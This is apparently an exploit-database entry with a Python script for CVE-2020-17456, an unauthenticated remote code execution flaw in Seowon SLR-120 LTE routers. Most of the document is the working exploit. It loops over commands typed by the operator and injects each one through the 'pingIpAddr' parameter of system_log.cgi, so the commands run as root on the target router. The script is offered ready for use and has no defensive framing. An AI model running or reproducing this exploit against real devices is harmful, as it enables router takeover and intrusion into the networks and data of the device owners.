Exploit for Seowon SLR-120 Router Remote Code Execution CVE-2020-17456

Name: Exploit for Seowon SLR-120 Router Remote Code Execution CVE-2020-17456
Rating: 5 (337 reviews)
2022-03-11 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:166273
# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)  
# Date: 2022-03-11  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: http://www.seowonintech.co.kr  
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30  
# Version: All version  
# Tested on: Windows 10 Enterprise x64 , Linux  
# CVE : CVE-2020-17456  
  
# [ About - Seowon SLR-120 router ]:  
  
#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,  
#The convenience of sharing wireless internet access invigorates your lifestyle, families,  
#friends and workmates. Carry it around to boost your active communication anywhere.  
  
# [ Description ]:  
  
#Execute commands without authentication as admin user ,  
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.  
  
# [ Vulnerable products ]:  
  
#SLR-120S42G  
#SLR-120D42G  
#SLR-120T42G  
  
import requests  
  
print ('''  
###########################################################   
# Seowon SLR-120S42G router - RCE (Unauthenticated) #  
# BY:Aryan Chehreghani #  
# Team:TAPESH DIGITAL SECURITY TEAM IRAN #  
# mail:aryanchehreghani@yahoo.com #   
# -+-USE:python script.py #  
# Example Target : http://192.168.1.1:443/ #  
###########################################################  
''')  
  
url = input ("=> Enter Target : ")  
  
while(True):  
  
try:  
  
cmd = input ("~Enter Command $ ")  
  
header = {  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",  
"Accept": "*/*",  
"Accept-Language": "en-US,en;q:0.5",  
"Accept-Encoding": "gzip, deflate",  
"Content-Type": "application/x-www-form-urlencoded",  
"Content-Length": "207",  
"Origin": "http://192.168.1.1",  
"Connection": "close",  
"Referer": "http://192.168.1.1/",  
"Upgrade-Insecure-Requests": "1"  
}  
  
datas = {  
'Command':'Diagnostic',  
'traceMode':'ping',  
'reportIpOnly':'',  
'pingIpAddr':';'+cmd,  
'pingPktSize':'56',  
'pingTimeout':'30',  
'pingCount':'4',  
'maxTTLCnt':'30',  
'queriesCnt':'3',  
'reportIpOnlyCheckbox':'on',  
'logarea':'com.cgi',  
'btnApply':'Apply',  
'T':'1646950471018'  
}  
  
x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)  
  
print(x.text)  
  
except:  
break